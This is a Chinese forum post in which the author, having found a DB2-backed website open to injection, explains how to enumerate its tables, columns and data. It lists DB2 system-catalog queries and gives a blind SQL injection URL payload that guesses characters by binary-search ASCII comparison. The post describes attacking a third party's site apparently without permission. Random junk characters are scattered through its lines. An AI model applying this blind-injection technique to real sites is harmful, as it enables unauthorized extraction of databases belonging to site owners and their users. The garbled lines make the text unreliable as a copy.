使用DB2的人比较少了,今天碰到了一个可供注入的DB2网站,想试试身手。不过在网上很难找到相关的资料,只好自己研究了。
4 c& u. [' {$ E参考了IBM DB2的文档,总结了这样几条: 3 m' N- J1 Y5 q$ C: @4 B
1、select NAME from SYSIBM.SYSTABLES where CREATOR =USER 3 |+ o9 n% h! S% T8 z
可以返回系统中所有用户创建的表(table)名 6 Q, m# w, Q) t# e* p2 r a: T
2、select NAME from SYSIBM.SYSCOLUMNS where TBCREATOR = '' and TBNAME=''
) V% s& e1 K7 y返回表中的列名 - k3 V8 @5 ^$ \3 G: d+ G7 Q
3、select NAME from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY
& V& c9 ]! d1 o" R" s* \这是最关键的地方,返回第一条记录,类似于sql server中的top 1 / I% c1 t& {) f k' t7 r1 O/ b. i
4、SUBSTR(string, position, length) + Y, C' t4 O- n
返回字符串子串的函数,类似于mid
3 t1 k s2 T4 m- c; v' |2 ?7 s5、ASCII()这个就不用多说了。
8 }3 p2 O* A' J有了这些语句和函数,我们就可以很方便的用ascii拆半法猜出所有的table名,字段名,以及其中的数据了。 ' @$ e+ C8 `* B8 e: _$ [& x; ] i: N
例如判断第一个table的名称的第一个字符的ascii码是否大于50:
6 B J* I$ Z% M' T4 Fhttp://*.com?test.jsp?id=1 and (select ASCII(SUBSTR(NAME,1,1)) from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY)>50 --
- c `; }* S6 \& g% H8 z$ w1 Y( k+ z: E- D* A
http://blog.waynedeng.com/blogview.asp?logID=543
8 N5 p. ]: }5 c |
发表于 2012-9-15 14:06:51
收藏
支持
反对